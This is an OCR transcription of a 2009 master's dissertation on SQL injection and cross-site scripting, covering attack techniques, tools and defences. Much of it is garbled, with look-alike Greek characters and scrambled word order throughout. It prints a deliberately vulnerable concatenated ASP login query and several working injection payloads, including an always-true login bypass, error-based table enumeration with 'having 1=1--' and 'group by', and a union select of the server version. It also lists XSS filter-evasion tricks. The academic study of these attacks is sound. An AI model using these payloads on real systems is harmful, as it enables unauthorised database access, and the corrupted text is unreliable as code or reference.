docDcoM - Ιδρυματικό Αποθετήριο Α.Ε.Ι. Πειραιά Τ.Τ.
download 
Report Transcription
DcoM - Ιδρυματικό Αποθετήριο Α.Ε.Ι. Πειραιά Τ.Τ.
Dc oM
~NGSTON
/ Lf_5
U NI VE RS I TY
SQL INJ ECTION
Dissertation submitted
for the Degree of M ~ιs te r of S cίence ίη Networking ~1nd Data
Co ιnmunications
By
PARASKEV AKIS EMMANOUIL
SUPE RVISOR
PANAGIOTIS KOTZANIKOLAOU
KI NGSTON UNJVERSIT Y, SCHOOL O F COMPUTING AN D
INFORMAT ION SYSTEMS
Τ ΕΙ O F PIRAEUS, DEPARTM ENTS O F E LECTRONICS AND
AUTOMAT ION
J ULY 2009
Τ ABLE
OF CONTENTS
ABSTRACT ......................................................... .... ..................... 3
1 INTRODUCTION ................................. .......... ........................ 4
1.1
SQL comn1ands and possible exploitations ........................................... .4
1. Ι . 1
SELECT ............................................................................................... 4
1. 1.2
UN ION SELECT ................................................... .............................. 5
1.2
Penetι·atio11 attacks .............................................................................. 6
2
METHODOLOGIES FOR PENETRATION ATTACKS ........... 8
2.1
2.2
2.3
3
Aιιthenticati on
Mechanism shortcomings in Web applications ................. 8
Penetration testing techniques for web applications ......................... 9
CΙ'oss Si te Scl'ipting: .......................................................................... 1Ο
DATABASEATTACKS ...... ....................... .................. ....... ... 13
3.1
Different penetration attack techniques .......................................... 13
3.1.1
Obtaining lnformation Using Ειτοι· Messages ................................... 13
Acqιιiring Furtheι· Access .................................................................. 18
3.1.2
3.1 .3
S to ι·ed Procedιιι·es .............................................................................. 19
3.1.4
Second 0Γd e1· SQL Inj ection.............................................................. 19
3.1.5
Weak input validation ........................................................................ 20
3.1.6
PΓivileges wl1en connecting to databases ........................................... 21
3.1.7
Dynamic queιΎ inteι'faces .................................................................. 23
3.1.8
Canonicalisation eιτοι·s ...................................................................... 24
3.1.9
Diffe1·ences between databases .......................................................... 25
4
TOOLS FOR ATTACKS IMPLEMENTATION ........................ 27
4.1
Tools classitication .............. .... .. ..................... .... .............................. 28
4.2
4.3
4.4
Evaluating tJ1e Results ....................................................................... 28
Vulnel'abi lity scanning tools ............................................................... 29
Common tool featιπes: ...................................................................... 30
5 LESSONS LEARNED, wΑ YS το PROTECT FROM SQL
INJECTIONS ............ ........ ...... ........ ................................ ....... ...... 34
Gene ι·al steps towal'ds SQL injection pι·evention .................................. 34
5.2
lnput sanitization .............................................................................. 35
5.3
SQ L lnjection Detection, database pal't ................................................ 39
5.4
Standaid SQL Injection Testing .......................................................... 39
5.5
Union QιιeΙΎ SQL In_jection Testing .................................................... 40
5.6
Blind SQL In.jection Testing ...... .................... ..... .................. .. .... ...... .41
5.7
S toι·ed Pι·ocedu!'e lnj ection ........................................................ .. ....... 44
5.8
Data Validation Stl'ategies ................................................................ .44
5.8. Ι
Accept known good ........................................................................... 44
5.8.3
Reject known bad ............................................................................... 45
5.8.3
Sanitize ............................................ ................................................... 45
5.1
6
7
CONCLUSION .................. ...... ..................... .... ..................... 46
REFERENCES ................... ......... ............ ....... ........................ 47
2
ABSTRACT
J11 tl1i s tl1esis the SQL injection
conceιηing
exploiting SQL weaknesses
By
ιηeans
of data or
vulneι-ability
will bc
the access and
exaιηi11ed
ιηodification
executίon
systeιη cοιηιηaηds
of high privileged
opeι-ations
aspect
execution. Tl1e
(penetι·ation
vulneι·abilities
ίn
sorne cases
exaιηined
will be
exaιηined
in the san1e
Μοι·eονeΓ,
a pι·esentation of the tools tl1at have been invented to
just to dctennine tl1e
opeΓatίng
by tl1e web
attacks or interface application specific and tl1e SQL
asρect.
Defcnce
ιηodilication
on tl1e database (i.e. sl1utdown),
staten1ent
οι·
of SQL tables.
of SQL injectio11 tl1e exploitation of sensitive database data,
recovering contents of files in the database system and
inteι-face
wl1ich consists of
ιηechani sιηs
and tl1ei1· application possibilities will be
manneΓ: Inteι'face
degΓee
application specific and SQL specific.
of vulnerability a database
ίs
pι·event sιιcl1
attacks
exposed to, will take
place.
Α su ιηιηaΓy
"Lessons
of tl1e
ιηetl1ods
leaι·ned" chapteΓ,
to avoid SQL injection attacks will follow
analysing the possible defence
attacks.
3
ιηecl1anisms
ίη
tl1e
for sucl1
INTRODUCTION
SQL injection is a very common way to attack databases mostly tl1ose l1aving web
inteι-face
data
tΓans l ated to
inpιιt.
SQL quel'ies, could bccome dangeΓoυs fοι· the database
ι·eveal i11foπη ati o n
This form
contωl
Most of the tin1es malicίous code via http qucι·ies, whicl1 when
to unautl101·ised
ο[ attacks
useΓs.
becaιιse
is possible
and daιa planes. Despite being
ηιιιη eιΌu s pιΌ dυction systeιηs
integι·ity, οι· just
in SQL ιl1eι·e is no disιincιion between
ι·elati vely sinψle
connected to tl1e
ln teπ1et
to pIΌtecι agai nst,
tl1eΓe aι·e
that aΓe vιιlneΓable to tl1is
type of attack.
The n1ain consequences aΓe:
Confιdentiality: F reqιιent pLΌblem,
•
especially to these databases where
sensitive data aι·e being held.
Authe11tication: If ηο co nιpetent SQL sanitization is used to cl1eck ιιseΓ nan1es
•
and passwoι·ds, hacking ίnιο databases is possible. ·
•
Autl101·izatίon: Aιιthoι·isation
al teΓed
via exploitation
•
Integι·ity:
lnfo
tl1ωιιgl1
stoι·ed ίη
info
stoΓed
in a SQL database might be read or
a SQL injection.
a SQL database caould be eitheι· ιη οd ίίί ed ΟΓ deleted ..
The above mcntioned issues aι·e
platfoιη1
(on wl1ich
ιhe
SQL is ωns 011)
independenι.
There aι·e n1any n1eans of defence against SQL injection attacks:
•
lnptιt
•
lnput validati on/sanίtί sati on of the SQL tι·anlslated input via SQL pιΌceduι·es
•
Access 1·igtl1s management
validation/sanitisation on tl1e aplicatio11 side
Το ωaintain secuι·ity fοι·
applied
ίη ιηean s
a rcl1itectιιι·e, ηοι
1.1
to
of
ίη
with SQL
SQL ΓOιιtines and pΓoceduΓes
SQL databases all otl1er
νίιυs sca ιυ1ing,
foΓget
inteΓactin g
tl1e physical
secιιΓity measιιΓes
have to be
IDS systems deployment, safe
secu ι·ity
netwoΓk
appl i catίo n.
SQL con11nands and possίble exploίtatίons
1. 1.1 SELECT
SELECT qιιeι·ies ai-e used to
ι·etΓi eve in foιη1ation fιΌrn
injection, all tl1e at'gιιments sιιbmitted wiJI be used
4
ίη
a database.
Ιη
a diΓect
the SQL qιιery. If an 'ΌR" οι· a
WHERE s tate ιη ent is appended to tl1e paΓaιη eteι- 's legitimate va l ιιe and this
inpιιt
produces an eιτοΓ, direct injection is likely to take place. by expoiting tl1e e πΌι·
messages e.g.
= "SELECT GivenName, SιιJ"Name, lϊtl e FROM E ιηpl oyees WHERE
Eιηpl oyee = " & Eιηp l oyee I D
SQLStι-ing
MoreoveΓ
a SELECT queιΎ can be dangerous if coιηbi ned witl1 an "always tιυe"
statement
UNION SELECT
1.1.2
SELECT qιιeries aι-e usually used by many web applications using νaΙ"i ab le content.
These kind of qιιeΓi es aΓe
condition, wl1ich
ίf trιιe
ιη anipιιl ation
sensitive in the WHERE clause,
111aΓki11g
tl1c
t\1e SELECT queιΎ s l1oιιld give resιιlts. WH ERE claιιse ιηay
be altered to pΙ"Ονίde Γesults diΠeΓent than the ones
SELECT con1n1and injected into tl1c
ίηpιιt
Γequested
by ιιsing a UNION
fields. This way many SELECT qιιαίes
will be execιιted by one singlc s tateιη ent:
SELECT Fiι·mJd FROM
FROM
Thίs
Custoιηeι·s
Vendoι·s
WHERE 1 = 1 UNJON ALL SELl3CT Finηld
WHERE 1 = 1
gives back as a resιιl t tl1e Γecoι·ds
is ι·equiΓed
Searcl1
fοι· sο ιηe
fιιnctions
f1Όη1 fiι·st
qιιeι·ies a\togetheΓ.
and second
ALL
SELECT DISTINCT stateιη ents to be bypassed.
may be usi ng SQL queries containing LIKE clauses, i.e.
SQLStΓing = "SELECT Fiι·stName,
LastNan1e, Title FROM
Enψloyees
WHERE
LastName LIKE ' %" & stJ"LastNameSearc\1 & "%"'
% is a
wildcaΓd ,
so
ίη
the coιηn1and above WHl3RE wotιld
s t1·LastN an1eSea ι·cl1 appeaι·s ίη
ι·eturn tιυe
always whe ι·e
LastNan1e. If tl1e queιΎ sl1all not be sending ι·ecoι·ds,
tl1e val ιιe sl1all not be contained in the LastName
append a peι·cent sign and single quote,
ΟΓ
fιeld.
UsuaJly web applications
parentl1esis. The appended chaΓacteι·s shall
5
be rηirrored in tl1e WHERE paran1cter·s
LJKE "%%"
ίt
will lead to all the
script is
execιιted
vaι·iables aι·e
and the
given witl1
fonηs
inpιιt fιelds
ceΓtain
code
code is inserted into strings
fοι· execιιtion. Usιιally
asking
ίη
tl1e
displaying.
malicioιιs
passed to an SQL instance ser·ve1·
Web sites takes place by
injected string. It' πο value is added
ι·ecoι-ds
1.2 Penetr·ation attacks
SQL injections at"e attacks ίπ whicl1
lateι·
ίπ
fοι· ιιsen1ame
stΓings
validation of ιιseΓs
are
οη
ίπpιιι. Α
login
queΓy vaΓiables. Ι [
tl1ese
and password
are given as SQL
ιl1at
tl1ey can bypass tl1e database
secιπity
giving access to unauthoΓised 3rd paΓties ΟΙ' even woΓse allow the ιηodifιcation and/oι·
deletion of the database contents.
The example bellow shows an
unaιιthorised registΓation atteιηpt
(MS Access DB
being used for this):.
ιιseι· == Request.forn1 ("useι·")
pass == Reqιιest. forn1("pass")
Set Conn = SeινeΓ.Cι'eateObject('ΆDODB.Connection")
Set Rs == Seι·νeΓ.Cι·eateObject("ADODB.Recoι·dset")
Conn.Open (dsn)
SQL = "SELECT C=COUNT(*) FROM useΓs wheΓe pass="' & pass & '" and user-111
& LΙ Sel' & '""
ι·s.open
(sql,conn) if ι·s.eo f ΟΙ' Γs.bofthen
ι·esponse.wι·ite
"Database
Εποr"
else
ί f ι·s("C")
< 1 then
Γesρonse.wΓite
"[nvalid Credentials"
else
Γe spo nse. wι·ite
"Logged Jn "
end if
endif
[5]
6
ln
ιl1is
case
validity.
uscι·:
input i.e.
T11eι·e s hoυld
ιη anipιιlate
s ιιbn1it
ιl1e
ιιseι·name
and password variables is not cl1ecked
bc checks on tl1e
inpιιts,
even
thoιιgh
foι
any aιιacke ι- is ab le to
HTML con1n1ands can bypass these Γestι·iction s. If so ιηcone was to
the following
ίηpιιt:
test' Ο R 'Ι '=' 1'
pass: test
tl1e SQL tl1at would be ι·ea l y executed woιιld be:
SELECT
* FROM useΓs wl1ere pass='test' and ιιseΓ='test' OR 'Ι' = '1'
This stΓing sends tl1e following
comιηand
to the database:
"access the data for which the following conditions are tnιe: ιιser and pass equal to
'test', οι- 1 equal to Ι ." Tl1e 1= Ι condition is always tιυe i.e. tl1e attacker wi ll be
sιιccessfully
logged
ίη.
7
2
METHODOLOGIES FOR PENETRAΤΙΟΝ
2.1
Authentication
Α
Mecl1anis1η shoι·tcon1i ngs ίn
Web applications
n1ain vulneJ"abili ty of Web based applίcati on s is tl1e inability fο ι· stωn g
aιι then tication
mechanisms. Web application envi1Όnn1en ts i.e. ΗΠΡ ,
1-ITML, CSS, .JavaSc Ι"i pt do not pι·ov ide sufficient
secιιι·i ty.
Ιη
ΑΤΤ ACKS
The
Η ΤΤΡ pωtoco l p ιΌvides
both cases the steΓeoty pe
Ι"espo nse
fo 11ηs
two
A u thenticatί on
(cli ent side) takes place. ln
Bas ίc
ΗΠΡS ,
mec l1a ni s ιηs fο ι· aιιthen ticat i on
of autl1entication: Bas·ίc and Diges·t
request (se ιΎeι· side)- Λιιthenticatίon
autl1entication plain
tcx ι
is used. Ιη tl1e
Diges·t aιιthenιicat i on scl1ema enc ιγpΙ"ίοη ίs used ί η teιη1s of a hasl1 value, wl1ich is
t ίιη e
dependant (nonce), cιγptogι·aphi c key ge neΓated by tl1e se ι·ve ι-.
bellow a typical database/useι· coιηponen t d i agι·am is pΓesen ted:
Fιrewall
~
~.-.--.
_ . tnιp.//(oo,com/show.jsp?l0<Jιn~doc&ρass,.xyι
~
[3 1] Database/useJ" coιnponent d iagι·aιη
8
Web
Ιη
tl1e
F i gιι!'e
Penetι·ation
2.2
Ιη οι·deι·
app li cat ίon
•
shalJ be
υ sed.
language
testing techniques fo1· web applications
to succeed all the enν iιΌnιηen tal
penetι·atίon
for a
defιned
systen1, web
an
seι·νeΓ softwaΓe, sαipιin g
This kind of inforn1ation can be Γetrieved by :
HEAD and OPTIONS in
ίη
cases,
opeΓating
i.e.
paΓaιηeteΓs fο ι·
hιtp ι·equests. HeadeΓ
of sucl1 Γeq υ ests, in
ιηοs t
tl1e SERVER stΓing ΟΓ anotheΓ sin1ilaI" stΓing, state the version
web seιveι· and
othcΓ
ί f the
paran1eters sυcl1 as opeΓa6ng systen1 or scι-i pt
envi1Όn111ent.
•
Analysing eιτο r messages. Special inteι·est is attΓacted for specific erI"OΓ
messages
pΙΌνided
by specifι c application, helping to ι·eco gn i se t\1e
application itself and possibly it's ve ι·s ion .
•
Looking υp fοι· a ceΓtain
cΓeate
•
a different diι·ecto Γy
SoυΓce
Ιηpιιt
stΓuctυΓe fοΓ
known and
ιιιιkηοwη
file types.
ιφ
so that
can be detenηined.
eηνίΙΌηιηeηt:
Catalog - ΙΕδ. 1
Fίle
web seι·vices
below νaΓiabl c (lteιη lD) has an eιτatίc valιιe on ly to exposc tl1e
application
•
Sοιηe
feed witl1 ίnvalίd data so that scΓipting eιτοΓs can be manίpιιlated. !η the
Fίguι·e
1
of diΓectoιΎ structυre.
code analysing. Speci fιc code sωηgs aΓe being looked
softwa Γe veΓsions
•
patteι·n
Edit
Address \
Vlew
·
Faνorίtes
Tools
Help
http: //wν~w. example .com/shop. asp?ItemID=52; 1
Microsoft VBScript runtime error 800a000d'
Type mismatch: 'CLng'
/shop.asp, line 792
[2J
•
TC P/IC MP and Servicc
the peneιι·ation
testeι"/attackeΓ
apρlication e ηνiιΌ ηιηeηt
Αιηap
and
Fin gerprintίn g: FingerpΓinting
tools ex ist which allow
to deteΓn1ine wl1icl1 opeΓating systeιη and whicl1
is rιιηηίηg. Tools sιιcl1 as such as Ν ιη aρ and
WebSeι-veι·SP. ΝΜΑΡ
and
Qιιeso ιιse infoΓmation t'ΙΌm
9
Qιιeso,
t\1e specific
l1ost TCP/f P to dΓiνe conclιιsions about tl1e opeι·a ting syste ιη , tl1e version of tl1e
k eιηe 1
a11d the patchset of whe web application. Those tools exan1ine ιιsιιally tl1e
seι·ve!' ΗΤΤΡ headeι·s
to
ι·etΓieve s ιιcl1 ίnΓο ηηatί οη.
B l ~a c kb ox Testing Metliod:
•
applications
ίη tenηs
Exception condίti on s a\'e pωvoked
of giving specific inputs, sucl1 as special
SQL scΓipting cοιηιηaηds οΓ Γequests in an invalid
ι·esponses
CιΌss
2.3
Web
cl1aΓactcι·s,
spaces,
Web application
a\'e tl1cn being analysed.
Site Sαipting:
Cι-oss-site scι·ipting
send
foιη1at.
fΊΌη1
ιηalίcίοιι s
(XSS) aιιacks οccιιι· wl1en an attack eι· uses a web application to
code,
useΓ[28]. Numeωus
geneΓa ll y ίη
tl1e
fοπη
of a bJ'Owsel' side sc ι·ipt , to a diΠel'ent cnd
coding eιτοι-s allowing attacks of this kind can be found along
Web applications. fn sucl1 cases SCl'ipts containing ιηatίcίοιιs code a ι·e being sent to
end
u seΓs,
lead ing ίn the possible l1anding of session tokens, cookies, ΟΙ' even
tl1e wl10\e accessed web page content. Tl'lls is possible
distingυish
whethel' the scι·ipt is to be tnιsted
XSS attacks can
geneι-ally
Ο Ι'
becaιιse bωwseΓs
can not
not.
be categoι·ized as stored οι· retlccted.
Ιη
Stored attacks t\1c code in,jectecl \1as been stoΓed
anywl1eι·e
ί.e.
not nacessaι·i\y only
fonιm οι· elwheι·e.
ίη
Γeplace
database bιιt ίη message
accessing tl1ose sites acq uiι·e also tl1e
ιηa li c i oιιs
in tl1e attacked
seι·veι·s
End users
scl'ipts, togetl1eι- witl1 tl1e inf·o
ι·equested.
Ιη Retlected
attacks the injected code can be contained in
seΓνeι-,
i.e. in eποΓ messages,
seιΎeι·s
to affect, by
Tl1ese infections
sιιbmi tting
Γesυlts
ι·outes sιιch
Γeq ιιiΓe
ιηessages
con1i ng frοιη tl1e
of a qιι e1Ύ etc. Reflected attacks ι·each the
as email links or any otheι·
tl1e useΓs "coopeΓati on" in
tenηs
f0Γn1
of communication.
of fo llowing a link οι·
a fοπη , whicl1 wil l then inject the malicioυs code in t\1e web seι·νeΓ to be
"taken". Tl1e bωwsel' then executes tl1e code as it came Γωιη a ' trusted'
As
Ι·a ι·
seιΎe\'.
as consequences aι·c conceι11ed, it is indiffeι·ent whetheι· attacks a ι·e stored
ι·eflectcd, ίt
inΓectcd
οι·
is only a n1attel' of "ωutc" used, also "Read only" sites aι·e as can be also
by XSS attacks.
The session coockie - a cookie used to identify the private session and maintain
state, between a useι· and a web application - ί s one of the Γavoul'ite ta Γgets of XSS
10
attacks. In such cases the seesion cookie is stolen and the attacke ι- can take over tl1c
session. By XSS attacks also all thc classic dangeι·s can occuι- sιιch as ν ίηιs
installation, rediι·ection to another web page, content rnodification etc.
Ιη οι·deΓ
to be rnoι·e difίicult
code, using si ιηpl e ι-ul es,
fοι·
sιιc\1
tl1e web application owners to
ίίlteι-
out ιηalicious
as fιlteι·ing < ο ι· > symbols, attackeι·s "hide" tl1e
rnal icious code by rnaking the ι-eqιιests
ίη
Unicode or using ve.-sions wl1ich do not
necessaΓily ι·eqιιίι-e <ο ι- > syιηbo l s.
Usιιa lly
ernbeddcd Javascι-ipts a ι·e being ιιsed,
buι
one can not exlιιde any active
content sιιch as ActiveX, VB scripts or Flasl1. Tl1is
policy against sιιcl1 attacks should
expected, tl1an
Ιη
filteΓing
many cases si ιηple
known
seι·veι· eιτοι·)
Γeqιιested
Ιη
ίs
pages.
be
fιlteι·ing
the ι-eason why the defence
out anytl1ing deviating
n1essages fl'O tl1e web application
tl1e
seινeι·s, sιιcl1
infonηation ι-egaι-ding
those cases the eχpοsιιι·e to a reflected
ίη
l'Ι'Οιη
of n1alicioιιs code.
can be ussed to convey
l1igl1. Many tools exist whicl1
vulnneΓabilities
patteιηs
ΗΠΡ eιτοr
tl1e 500 (inten1al
ι-atheι·
ίs
cιΌss
as
the
site scripting attack
any case coιιld assist attackeι·s to exloΓe
ιl1e
of a web application and exploit the1111·igl1t afteι· ιηaking injection
attacks.
Cοιηιηοη
XSS J avascΓipting tecl1niqιιes[29]:
•
e ιηbeciing
nested quotes: One can use escape quotes as follows \'
ο ι·
\" or the coιτesponding ιιnicode chaΓacteι·s \ιι0022 and \ιι0027
•
keywoι·d filteι·s
allowing al l javasCl'ίpts to execute e.g.:
a='na ν ί '; b=' gatoι-. ιιseι"Agent' ;al eι-t(eval (a+b))
•
E111bedded block scι·ipting coιηbined with insufticient ίηpυt lengtl1
can lead to gι-ec:ιt exposιπe to
ιι sed fοΓ
•
Ιη
haι-mful SCl'ίptin g
if if the code to be
the sc ι-ipting can be wι·i tten in a single sc.-ίpt soιπce .
cases SSL is being ιιsed, in web pages,
wa.-nings in case a script's Ol'igin is not
defence in
ι·egaι·d
tl1eι·e aι-e ιιsιιally
tnιsted ,
giving a linc of
witl1 tJ1e oι·igin of the code to be executed
11
(supposi ng that tι-ustcd OΙ" igins l1ave not been taken ονe ι') Tl1is can be
bypassed
ίf images οι·
e,g, .txt files can be uploaded
011
those files conιain javascι·ipt comιηands tl1e SSL orίgίn
be bypassed and possible input lengtl1
•
JavasCΓίpts
can be used to Γead
tilteι·ing
entiι·e
a scι·νeΙ". If
waιηίng
can
can be bypassed too.
web page contents and
cl1ange torn1 e l eιηents.
•
In1pωpeΙ"
qιιotes
syntax vιιlneI"abilities can be exploited e.g. it'we do not use
any " Ο Ι"' in_jected is tΙ"anslated as a \" and \' Ι"espec ti ve l y . T11is
adds anothe ι· complexity factoΙ" if big scι·ipts
Γunctionalities aΓe
to be used.
12
involv ίng conψlex
DA Τ ABASE
3
Ι η tl1ίs
cl1apter tl1e
Α ΤΤ ACKS
vulneι·abi lίty
paι·t ίη
011 tl1e database
"injectjon" attacks
wί ll
be
examined.
The databases vulnerability
by
ιηany
tools
-ιηοst
ι·egarded
should be
targets. Meta
ίn sιιch
attacks could be easily detected, and exploited,
of theιη ca11 bc downloaded
wίtl1
as "safe" even the ones
cl1aracteι·s
are used as
ίηpιιt ίn
fοι· ΙΙ·ee fΓοιη
the
l nteιηet. Νο
impoι·tance οι·
Jeast
ίnterface fonη s,
the web
site
traflic can be
ίιηpleιηe ηt
to
tl1ose attacks. T11ose cl1aι-acteι·s will be tι·anslated as con1n1ands in thc coιltt'ol plane,
as SQL does not have sepaι·ate control and data planes. Any contωl chaΓacteι·
ίnseΓted ίη
as data
filteι·ing
takes place
sendίng
code
oveΓflows,
pΓOblem
accoιιnt
tlπoιιgh
to gain
is
having
pΓivileges
to
is conveyed to be
befoΓe οι· ίη
and many
penetι·ation
The
ίηpιιt
legitin1ate data channels,
otheΓ
flaws,
ίnvolve
dynaιηic
ιιsing
cοιηιη aηd
as an SQL
ot' a pιΌcess
no
the use of
execυtion, injectίon pι·oblem s
η10Γe
otl1eΓ
ιηοΓe
need only
ιηay
be
e l iιηinate
alte Γed
by
bιιffeΓ
t\1an a single cl1an11el
fοΓ
tl1e data to be
adeqιιate saΓegυaι·d s,
vιιlneι·abilitίes
attacks aie:
ηο
paΓsed.
thι·oιιgh
an
example, if an application's login l1as
a database, tl1en witl1out
ίnjection
(if
means. Wl1ile
severe if an application is connected to the database
administΓatoΓ Γights. FοΓ
to SQL
Execιιt ion
between).
migl1t be able to do so. Con1mon
sιιsceptibl e
execιιted
ηο
attackeι
that make data access code
insιιffιcient valίdatίon
constn1ction of SQL stateιηents witl1
an
of tl1e
saniti sation of tl1e
inpιιt daιa,
inpυt paΓan1etcΓs,
connection to the database thωιιgh an accoιιnt witl1 οeΓ pι·ivileged ι-ights .
3.1
Diffeι·ent penetΓation
attack techniqιιes
3.1. l Obtaining l nfonηation Using Erroι· Messages
• Case 1 ρlain SQL commands
ΙΓ
tl1e database data is to be
alteΓed,
the attacker needs to know tl1e
stnιctuΓe
of it's
tables (at least tl1e basic ones).
FοΓ exaιηp l e, ίη
t\1e case bellow tl1e 'ιιseι-s' table could !1ave been Cl'eatcd as fol lows:
13
cι-eate
table usel's( id int,
u se1η an1e varcha ι·(255),
vaτchar(255),
password
pι·ivs ίηt
)
having the ιιseι·s bellow created:
in seι·t
into useι·s values( Ο, 'adιηin ', Ί·OOtrOx!' , OxfTfT)
in seι·t
into
inseι·t
into usel's values( Ο, 'clπi s', 'password', OxOOff)
in seι·t
into useι·s values( Ο,
useι·s valιιes( Ο ,
'guest',
'gιι est' , ΟχΟΟΟΟ)
'fι·ed', ' sesaιηe' , ΟχΟΟΠ)
[5]
If an
attackeΓ
is to create a new
of tl1e 'users' table. lf eιτοl'
fοι·
ASP, tl1e
s tnιctω·c
info provided by those
useι· accoιιnt,
ιηessages occιιl'
he/she will l1ave to know the
, whicl1 is
tlιe
expected thing to l1appen
of tl1e whole database can be worked
eιτοι·
stιυcιu ι·e
ο ιιt ,
by exploiting tl1e
messages. f f also, knowing the database's
attacke1· J1as cΓeated an account (even a low pΓiνileged one) !1e/she can
stntct uΓe,
haνe
tl1e
access to
any database val ιιe, that this account that 11as been CJ'eated, has access to, thΓoιιgh tl1e
ASP application
Γega ι·ding
ιιsed
to connect to SQL
tl1e steps tl1at
aΓe
SeιΎel'.
The examples bellow
aΓe
typical
followed so tl1at an attacker can gain contl'OI
οΓ
a
database.
FiΓst
tlιe
of al 1, tbe database' s stnιctιιτe has to be explored. Το Α 'select' statement υsing
'11avi11g' claιιse coυld be ιιsefυ l fοι· tlιi s.
Useιηame:'
By tl1is
having 1=1--
ίηpιιt
tl1e following
e ιτοΓ
is
extΓacted fιΌηι
tl1e
(Μίcι·οsοΓι: fοΓ
tl1is case)
database:
Micι·osoft
OLE DB
[Micl'OsoΓt][ODBC
ΡΓον ίdeΓ fοΓ
SQL
ODBC DΓi νeΓs eιτο r '80040el4'
SeιΎeΓ
Dι·iveΓ)[SQL
Serveι·]Co lιιιnn
'υ seιηanιes.id'
is
invalid ίη tl1e select list becιιιιse it is not contained ίη an aggΓegate function and theι·e
is no GROUP ΒΥ clause.
/pΙΌcess_ ιιserlog.asp, 1ί ne
27
14
Tl1is eιτοι· ιηessage gives away tl1e table and colun1n
naιηes
of tl1e
fίι·st co luιηn
of t11e
qιιeιγ:
Α
"GROUP BY"caluse can be ιιsed to
Useι-name: 'gωup
by
useι·naιηes.id
ι·etΓieve ίηfοηηaιίοη
about the otheΓ colιιms:
having 1=1--
The e ιτοΓ tl1at fo llows gives away anotheι· table element:
Microsoft OLE ΟΒ Ρι·ονίdeΓ for ODBC Oι·iveι·s eιτοΓ '80040e 14'
[Micωsoft)[ODBC
ίη
is invalid
SeΓνeΓ Oι·iveι-)[SQL Seι·νeΓ] Cο lιιιηη 'useπ1aιηes.useπ1aιηe'
SQL
the select list b eca ιιse
ί t ίs
not contained
ίn e i theΓ
an aggΓegate
fιιnction
or the GROUP ΒΥ claιιse.
/pJΌcess_ιιseΓl og.asp,
line 27
Element by element tl1e tables are being
passwoΓd
'gι·οιιp
eχploΓed
to the point that tl1e
ιιseπ1an1e
and
table stnιctuι·e is known:
by
ιιseιηames.id , ιιseι·ηaιηes.ιιseιηaη1e, ιι seιηames.passwo ι·d , ιι seΓnan1es .pι·ivs
having 1=1-... wl1icl1 pΙΌduces ηο eιTo r, and is fιιncti on a ll y equivalent to:
selcct * °f'l'Om
u seι·s
useιηame
wl1ere
="
ln οιιr case, ιιp to now the attackel's know that the only table affected is tl1e "useΓs"
table rega ι·ding tl1e colunιns : id, useιηaιηes, passwol'd and
Το peΓfοπη
the
typc of eacl1
ι·i g ht qιιeΓies
colιιmn
In tl1is case SQL
Γeqιιiι·es
ι·etι· i eve
data ΟΙ' to
to the cο lιιιηηs the
as follows :
select s uιη (u se π1an1e)
eχecιιtes
"sum" with
tl1e equity of tl1e two
fΓΟιη ιιseΓnam es--
pι·ioΓity oνeJ'
the
restΓicting paι·a1ηetet'
wl1ich
ιΌwsets.
T11is takes advantage of tl1e fact that SQL seιΎe r
befoΓe deteπηining
oνeΓWl'ite valιιes
shall be detected. Tl1is can be easily done with tl1e use of a 'type
co11νeΓsio11' eΙΤΟΙ' ιηessage
U se111aιη e : 'ιιηί ο η
to
pΓiνs.
wl1ethel' the
ηιιιηbeΓ
atteιηpts
to apply tl1e
of fields in tl1e two
ιΌwsets
is
'sιιιη' claιιse
eqιιal.
This
would Jead in tl1c following eηΌι· message:
Mi cΙΌsoft
OLE 08
[MicΙΌsoft][O D BC
opeι·at ion
ΡΙΌν ίdeι· fοι·
SQL
SerνCI'
ODBC Οι·ίνeΓs e πο ι· '80040e0T
Driver][SQL
Seι·veι·]T11e
ca1111ot take a va ι·chaι· data type as an aΓguιηent.
/pIΌcess_l og in. asp,
line 27
15
sum
ΟΓ aνeΓage
aggregate
Indicating tl1e type ot· the "ιιseι·nan1e" field i.e. "va ι·cl1 a ι"'.
Α
way to calculate the data type of anotl1eΓ
with a
ΙΌwset
Γelevant erιΌr
Usernaιηe :
havi ng type "
nιιmeΓical"
ι·owset
If tl1e
is to
tιΎ
to add
otheΓ ωwset
etc.
nιιmeι·ical
tl1e
is not
message will appea1-.
' union select sιιm( ίd)
fΓο ιη ιιse Γs--
Micω soΓt OLE DB
ριΌνίdeΓ fοι·
ODBC
[Micι-osoft][ODBC
SQL ServeΓ
0Γi ver][SQL Seι'VeΓ]A ll qυeι·ies ίη
containing a UN ION
taι·get
οι· n1υltip l y
opeΓatoι· ιηιιsι
DΓiνel'S eιτω·
have an
'80040e \4'
eqυa l numbcι·
an SQL sιateιηcnι
of expι·essions in tl1ei1·
lists.
/pΙΌcess_l ogin.asp ,
AttackeΓs
line 27
can exploit any
info1η1at ion
given out of
conveι·sion.
lf one attempts
eιτοι· ιη cssages aboυt
tl1e
database.
One
ιη essage ι·elates
integeι-,
to type
the e ιτοΓ message to follow will
used, such a case
ι·eveals
Γeνeal
conveΓting
a
stι·in g
into an
tl1e whole stι"ing. In the eχam ple SQL
the operating systeιη - even it's patchset level- tl1e
veι·sion
of the SQL seι·νeΓ,
Useι·nan1e: ' ιιnίοη
Mίcrosoft
select @@veΓs i on , 1, 1, 1--
OLE DB
Pι-ovid er fοι·
[Microsoft][ODBC SQL
nva1·cha1· value
13:15:04
Wίndows ΝΤ
Seι'Veι·
(c) 1988-2000
Χ86)
2000 - 8.00. 194 (Intel
.July 6 2008
Mi cΓoso ft Coφorat i on En teφΓί sc
to covel't tl1e "@@ve1·sion" constant to
intege ι·
in tl1e ' useι·s ' table is ί11tegeΓ.
ΑΙΙ valιιes
•
SQL
the
Edition
οη
line 27
coιηn1and tΓi es
cοlιιιηη
'80040e07'
5.0 (B ιιild 2 193: Service Pack 2)' to a colυmn of data type ίηt.
/pιΌcess_login.asp,
This
DΓivers e ιτοΓ
SerνeΓ Oι·iver][SQL Seι·veΓ]Synιax eιτοr conveι·t in g
' Mi cωsoft
Copyι·igl1t
ODBC
in all database's tabl es can be Γead using the same way.
Case 2 Web ίn te ι·faced SQL
injectίo n ν ί a
16
bttp
as tl1e
fiΓst
anotheι· αιse
!11
suppose web connccted database
refeπing
to wι·iteι·s, books, etc.
accessible fιΌm the web, in wl1ich tl1e URL coιιld be used as input to execute SQL
coιnιηands.
Α
typica1 URL to read a story οιιt of this site woιιld be tl1e following:
Ιι t tρ ://stιι ίHΙ/l101ncl1nsι:/rn1cticn 1/ί nιl~x .ί1sp'?stoσ= 1
Ιη
a qιιeιΎ wheι·e nationality could be ιι sed a URL could look like:
l1ttp://stιιaΓlll101neLxιςc/pnlCt icnl/iηιlς:χ_ co ιιηιιγ.asρ'!ι;οιιιΗ ιγ
